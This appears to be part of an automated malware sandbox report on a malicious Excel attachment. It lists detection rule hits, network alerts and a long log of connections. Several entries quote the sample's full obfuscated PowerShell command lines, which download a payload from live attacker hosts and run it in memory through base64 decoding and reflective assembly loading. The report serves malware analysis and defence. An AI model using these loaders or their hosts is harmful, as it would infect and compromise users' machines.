CAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))", CommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTS
      Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
      Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3148, TargetFilename: C:\Users\user\AppData\Local\Temp\k1rszaqi.mg2.ps1

      Data Obfuscation

      barindex
      Sigma detected: Dot net compiler compiles file from suspicious location
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3148, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline", ProcessId: 3328, ProcessName: csc.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-28T07:28:05.786269+010020241971A Network Trojan was detected172.245.123.2980192.168.2.2249164TCP
      2024-11-28T07:28:11.300068+010020241971A Network Trojan was detected172.245.123.2980192.168.2.2249166TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-28T07:28:05.786085+010020244491Attempted User Privilege Gain192.168.2.2249164172.245.123.2980TCP
      2024-11-28T07:28:11.300059+010020244491Attempted User Privilege Gain192.168.2.2249166172.245.123.2980TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-28T07:28:17.864630+010028587951A Network Trojan was detected192.168.2.2249167172.245.123.2980TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: Swiftcopy.xla.xlsxVirustotal: Detection: 14%Perma Link
      Source: Swiftcopy.xla.xlsxReversingLabs: Detection: 15%
      Machine Learning detection for sample
      Source: Swiftcopy.xla.xlsxJoe Sandbox ML: detected

      Phishing

      barindex
      Yara detected HtmlPhish44
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthings[1].hta, type: DROPPED
      Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49168 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: unknownHTTPS traffic detected: 152.231.117.86:443 -> 192.168.2.22:49163 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 152.231.117.86:443 -> 192.168.2.22:49165 version: TLS 1.2
      Source: Binary string: CallSite.Target.pdb source: powershell.exe, 0000000F.00000002.536967212.000000001C282000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Hp6pdblib.pdb source: powershell.exe, 0000000F.00000002.536967212.000000001C251000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdb1 source: powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: dbpdbtem.pdb source: powershell.exe, 0000000F.00000002.536967212.000000001C251000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.pdbhP source: powershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.pdb source: powershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Document exploit detected (process start blacklist hit)
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficDNS query: name: ljg.cl
      Source: global trafficDNS query: name: ljg.cl
      Source: global trafficDNS query: name: ljg.cl
      Source: global trafficDNS query: name: ljg.cl
      Source: global trafficDNS query: name: 3105.filemail.com
      Source: global trafficDNS query: name: 3105.filemail.com
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
